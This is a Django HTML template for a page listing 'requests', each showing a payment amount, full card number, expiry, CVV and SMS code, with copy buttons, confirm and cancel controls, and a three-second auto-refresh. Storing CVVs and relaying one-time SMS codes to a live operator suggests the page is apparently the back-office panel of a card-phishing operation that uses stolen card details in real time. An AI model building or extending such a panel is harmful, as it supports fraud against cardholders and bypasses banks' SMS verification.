
{% extends 'base.html' %}
{% block title %}Список заявок{% endblock %}
{% load static %}
{% load mathfilters %}

{% block content %}

<style>
.img-thumbnail {
    {#height: 50px;#}
    width: 40px;
    {#display: flex;#}
    margin-left: 5px;
}
</style>
<div class="container-fluid">
{{ work_data }}
    <div class="row">

    {% for payment in page_obj %}
    <div class="col-3 card" style="background-color: #e0fff6">
      <form method="post" action=''>
      {% csrf_token %}

        <div class="row card-header" style="background-color:
             {% if payment.counter|mod:4 == 0 %}
                #f6b09e
             {% elif payment.counter|mod:4 == 1 %}
                 #cafdbb
             {% elif payment.counter|mod:4 == 2 %}
                 #a4bbf5
             {% elif payment.counter|mod:4 == 3 %}
                 #f6e79e
             {% endif %}
             ;">
            <div class="col-6">
                 № {{ payment.counter }}
            </div>
                <div class="col-3">
                 <button name="cancel_payment" value="{{ payment.id }}" style="margin-bottom: 0px; margin-top: -10px; height: 25px;font-size: small" type="submit" class="btn btn-danger btn-sm">X</button>
            </div>
        </div>
        <div class="card-body" >
            <div class="row" id="amount{{ forloop.counter }}">
                 {{ payment.amount }}<img class="img-thumbnail" onclick="CopyToClipboard('amount{{ forloop.counter }}')"  src="{% static '/img/copy2.png' %}">
            </div>
            <div class="row" id="card_number{{ forloop.counter }}">
                 {{ payment.card_number }}<img class="img-thumbnail" onclick="CopyToClipboard('card_number{{ forloop.counter }}')"  src="{% static '/img/copy2.png' %}">
            </div>
            <div class="row" id="expired_month{{ forloop.counter }}">
                {% if payment.expired_month < 10 %}0{%  endif %}{{ payment.expired_month }}/{{ payment.expired_year }}<img class="img-thumbnail" onclick="CopyToClipboard('expired_month{{ forloop.counter }}')"  src="{% static '/img/copy2.png' %}">
            </div>
            <div class="row" id="cvv{{ forloop.counter }}">
                 {{ payment.cvv }}<img class="img-thumbnail" onclick="CopyToClipboard('cvv{{ forloop.counter }}')"  src="{% static '/img/copy2.png' %}">
            </div>

            <div class="row">
                <div class="col-auto" id="sms_code{{ forloop.counter }}">
                     {{ payment.sms_code|default_if_none:"" }}

                </div>
                <img class="img-thumbnail" onclick="CopyToClipboard('sms_code{{ forloop.counter }}')"  src="{% static '/img/copy2.png' %}">
                    <div class="col-2">
                     <button name="confirm_payment" value="{{ payment.id }}" style="margin-bottom: 0px; margin-top: -10px; height: 25px;font-size: small" type="submit" class="btn btn-success btn-sm">OK</button>
                </div>
            </div>
        </div>
          </form>
    </div>

    {% endfor %}
</div>
</div>
<script>
function CopyToClipboard(containerid) {
    if (window.getSelection) {
        if (window.getSelection().empty) { // Chrome
            window.getSelection().empty();
        } else if (window.getSelection().removeAllRanges) { // Firefox
            window.getSelection().removeAllRanges();
        }
    } else if (document.selection) { // IE?
        document.selection.empty();
    }

    if (document.selection) {
        var range = document.body.createTextRange();
        range.moveToElementText(document.getElementById(containerid));
        range.select().createTextRange();
        document.execCommand("copy");
    } else if (window.getSelection) {
        var range = document.createRange();
        range.selectNode(document.getElementById(containerid));
        window.getSelection().addRange(range);
        document.execCommand("copy");
    }
}
</script>


    {% include 'includes/refresh_3sec.html' %}


{% endblock %}

